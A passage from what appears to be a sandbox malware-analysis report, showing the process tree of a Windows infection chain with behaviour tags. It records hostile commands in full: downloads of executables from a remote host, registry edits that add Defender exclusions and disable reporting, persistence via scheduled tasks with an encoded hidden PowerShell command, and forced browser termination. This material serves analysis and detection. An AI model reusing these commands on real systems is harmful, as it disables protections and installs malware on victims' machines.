cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:4652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe
5⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02520f255d0ba43a.exe
Tue02520f255d0ba43a.exe
6⤵
- Executes dropped EXE
PID:4264

C:\Users\Admin\Pictures\Adobe Films\t2y2IyXDHgdSnEi_aVjgEuJo.exe
"C:\Users\Admin\Pictures\Adobe Films\t2y2IyXDHgdSnEi_aVjgEuJo.exe"
7⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe
"C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:2396

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\3A83.bat "C:\Users\Admin\Pictures\Adobe Films\HiBTZE6Gv4KxjmirFmay03bJ.exe""
8⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
9⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/4460_1647529798_1063.exe" "4460_1647529798_1063.exe" "" "" "" "" "" ""
9⤵
- Executes dropped EXE
PID:5012

C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "/download" "http://file-coin-coin-10.com/files/1245_1647445154_9529.exe" "1245_1647445154_9529.exe" "" "" "" "" "" ""
9⤵
- Executes dropped EXE
PID:3404

C:\Users\Admin\AppData\Local\Temp\1348\4460_1647529798_1063.exe
4460_1647529798_1063.exe
9⤵
- Executes dropped EXE
PID:5236

C:\Users\Admin\AppData\Local\Temp\1348\1245_1647445154_9529.exe
1245_1647445154_9529.exe
9⤵
- Executes dropped EXE
PID:5648

C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\37A3.tmp\3A82.tmp\extd.exe "" "" "" "" "" "" "" "" ""
9⤵
PID:1576

C:\Users\Admin\Pictures\Adobe Films\6zYhJZFz7hGRxH5AOfPbfb1q.exe
"C:\Users\Admin\Pictures\Adobe Films\6zYhJZFz7hGRxH5AOfPbfb1q.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4216

C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe
"C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 35
8⤵
PID:3108

C:\Windows\SysWOW64\timeout.exe
timeout 35
9⤵
- Delays execution with timeout.exe
PID:3236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
PID:5972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
PID:6012

C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe
"C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 624
8⤵
- Program crash
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 660
8⤵
- Program crash
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 668
8⤵
- Program crash
PID:3328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 824
8⤵
- Program crash
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1224
8⤵
- Program crash
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1236
8⤵
- Program crash
PID:2984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1132
8⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "4B3of8v9JlXMrHyDZ8ywGtP7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\4B3of8v9JlXMrHyDZ8ywGtP7.exe" & exit
8⤵
PID:3968

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "4B3of8v9JlXMrHyDZ8ywGtP7.exe" /f
9⤵
- Kills process with taskkill
PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1444
8⤵
- Program crash
PID:5816

C:\Users\Admin\Pictures\Adobe Films\PhsHMlF6tpL4cItkeiIXvtL7.exe
"C:\Users\Admin\Pictures\Adobe Films\PhsHMlF6tpL4cItkeiIXvtL7.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:4704

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:5096

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:2716

C:\Users\Admin\Documents\iyYRA2zjB7qX2F6ikmR6SV3S.exe
"C:\Users\Admin\Documents\iyYRA2zjB7qX2F6ikmR6SV3S.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:3100

C:\Users\Admin\Pictures\Adobe Films\bt6RuJUGA2_XYKNjgPQ5G4KD.exe
"C:\Users\Admin\Pictures\Adobe Films\bt6RuJUGA2_XYKNjgPQ5G4KD.exe"
9⤵
- Executes dropped EXE
PID:5052

C:\Users\Admin\Pictures\Adobe Films\gsqNVzo3JRFSA0n3M3dgMnUr.exe
"C:\Users\Admin\Pictures\Adobe Films\gsqNVzo3JRFSA0n3M3dgMnUr.exe"
9⤵
- Executes dropped EXE
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 580
10⤵
- Program crash
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 624
10⤵
- Program crash
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 652
10⤵
- Program crash
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 740
10⤵
- Program crash
PID:5468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 788
10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Program crash
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 732
10⤵
- Program crash
PID:5656

C:\Users\Admin\Pictures\Adobe Films\6AMZrD3zpEI3XVpw_LFdRZFT.exe
"C:\Users\Admin\Pictures\Adobe Films\6AMZrD3zpEI3XVpw_LFdRZFT.exe"
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:1172

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
10⤵
PID:428

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
11⤵
- Loads dropped DLL
PID:5156

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
12⤵
PID:4980

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
13⤵
- Loads dropped DLL
PID:4456

C:\Users\Admin\Pictures\Adobe Films\nXFeAbvXLg7Hi4X0yNObClwf.exe
"C:\Users\Admin\Pictures\Adobe Films\nXFeAbvXLg7Hi4X0yNObClwf.exe"
9⤵
- Executes dropped EXE
PID:5008

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
10⤵
PID:4292

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
11⤵
- Kills process with taskkill
PID:4116

C:\Users\Admin\Pictures\Adobe Films\43iKPl1AdRKm4gLJtv_LcXoy.exe
"C:\Users\Admin\Pictures\Adobe Films\43iKPl1AdRKm4gLJtv_LcXoy.exe"
9⤵
- Executes dropped EXE
PID:3132

C:\Users\Admin\AppData\Local\Temp\7zSBC53.tmp\Install.exe
.\Install.exe
10⤵
- Executes dropped EXE
PID:4304

C:\Users\Admin\AppData\Local\Temp\7zSD55A.tmp\Install.exe
.\Install.exe /S /site_id "525403"
11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:1400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
12⤵
PID:5324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:3556

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
13⤵
PID:4648

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
14⤵
PID:1580

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
14⤵
PID:2512

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
12⤵
PID:6068

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
13⤵
PID:5296

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
14⤵
PID:2844

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
14⤵
PID:5548

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpqMyinlc" /SC once /ST 06:17:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
12⤵
- Creates scheduled task(s)
PID:4044

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpqMyinlc"
12⤵
PID:4352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpqMyinlc"
12⤵
PID:5428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:4352

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ldSVNmI.exe\" j6 /site_id 525403 /S" /V1 /F
12⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4488

C:\Users\Admin\Pictures\Adobe Films\Q9_E6thG7mij2_I43zmvk8Rh.exe
"C:\Users\Admin\Pictures\Adobe Films\Q9_E6thG7mij2_I43zmvk8Rh.exe"
9⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4132

C:\Users\Admin\Pictures\Adobe Films\6LMUTF51wzLnUCA_NSsUzVYC.exe
"C:\Users\Admin\Pictures\Adobe Films\6LMUTF51wzLnUCA_NSsUzVYC.exe"
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:4740

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
10⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1848

C:\Users\Admin\AppData\Local\Temp\82E1H.exe
"C:\Users\Admin\AppData\Local\Temp\82E1H.exe"
11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5596

C:\Users\Admin\AppData\Local\Temp\HLA0C.exe
"C:\Users\Admin\AppData\Local\Temp\HLA0C.exe"
11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5892

C:\Users\Admin\AppData\Local\Temp\D0826.exe
"C:\Users\Admin\AppData\Local\Temp\D0826.exe"
11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6060

C:\Users\Admin\AppData\Local\Temp\8860B.exe
"C:\Users\Admin\AppData\Local\Temp\8860B.exe"
11⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5252

C:\Users\Admin\AppData\Local\Temp\4A4I5.exe
"C:\Users\Admin\AppData\Local\Temp\4A4I5.exe"
11⤵
PID:1448

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\HSCN.H
12⤵
PID:5332

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\HSCN.H
13⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:5388

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\HSCN.H
14⤵
PID:5768

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\HSCN.H
15⤵
- Loads dropped DLL
PID:3696

C:\Users\Admin\AppData\Local\Temp\LI3FA3IG15M57IM.exe
https://iplogger.org/1QuEf7
11⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1472

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
10⤵
PID:1708

C:\Users\Admin\AppData\Local\Temp\zhangyan.exe
"C:\Users\Admin\AppData\Local\Temp\zhangyan.exe"
10⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4092

C:\Users\Admin\AppData\Local\Temp\zhangyan.exe
"C:\Users\Admin\AppData\Local\Temp\zhangyan.exe" -h
11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5732

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
10⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe
"C:\Users\Admin\AppData\Local\Temp\a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe"
11⤵
- Checks processor information in registry
PID:5568

C:\Users\Admin\AppData\Local\Temp\7929_1647444188_3653.exe
"C:\Users\Admin\AppData\Local\Temp\7929_1647444188_3653.exe"
10⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5488

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
10⤵
PID:5740

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5740 -s 268
11⤵
- Program crash
PID:5956

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
10⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\is-25TFO.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-25TFO.tmp\setup.tmp" /SL5="$D004E,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
11⤵
- Checks computer location settings
- Loads dropped DLL
PID:2988

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
12⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\is-A7S3K.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A7S3K.tmp\setup.tmp" /SL5="$1903C6,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
13⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5096

C:\Users\Admin\AppData\Local\Temp\is-KSM7G.tmp\nthost.exe
"C:\Users\Admin\AppData\Local\Temp\is-KSM7G.tmp\nthost.exe" 81
14⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:6052

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
10⤵
- Executes dropped EXE
PID:6124

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
10⤵
- Loads dropped DLL
PID:2188

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
10⤵
- Loads dropped DLL
PID:1760

C:\Users\Admin\AppData\Local\Temp\pK26geiEDlpwB\Soft706.exe
C:\Users\Admin\AppData\Local\Temp\pK26geiEDlpwB\Soft706.exe
11⤵
- Loads dropped DLL
- Adds Run key to start application
PID:3880

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--B4lBeMRI"
12⤵
- Loads dropped DLL
PID:2548

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffc0af8dec0,0x7ffc0af8ded0,0x7ffc0af8dee0
13⤵
PID:1900

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=1772 /prefetch:8
13⤵
PID:1936

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
13⤵
PID:5180

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=2020 /prefetch:8
13⤵
PID:2232

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2500 /prefetch:1
13⤵
PID:5936

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2580 /prefetch:1
13⤵
PID:5208

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:2
13⤵
PID:1484

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=3268 /prefetch:8
13⤵
PID:5132

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=516 /prefetch:8
13⤵
PID:3416

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=480 /prefetch:8
13⤵
PID:660

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
10⤵
PID:5544

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
11⤵
PID:4896

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
12⤵
PID:5564

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
13⤵
PID:4488

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
14⤵
- Loads dropped DLL
PID:5304

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
10⤵
- Checks computer location settings
PID:4776

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
11⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:1692

C:\Users\Admin\AppData\Local\Temp\win.exe
"C:\Users\Admin\AppData\Local\Temp\win.exe"
12⤵
- Checks computer location settings
- Loads dropped DLL
PID:5564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 19
13⤵
PID:5508

C:\Users\Admin\AppData\Local\Temp\win.exe
C:\Users\Admin\AppData\Local\Temp\win.exe
13⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\win.exe
C:\Users\Admin\AppData\Local\Temp\win.exe
13⤵
- Checks computer location settings
- Modifies registry class
PID:5544

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5544 -s 128
14⤵
- Program crash
PID:2676

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
10⤵
- Checks computer location settings
PID:3280

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
11⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5468

C:\Users\Admin\AppData\Local\Temp\win.exe
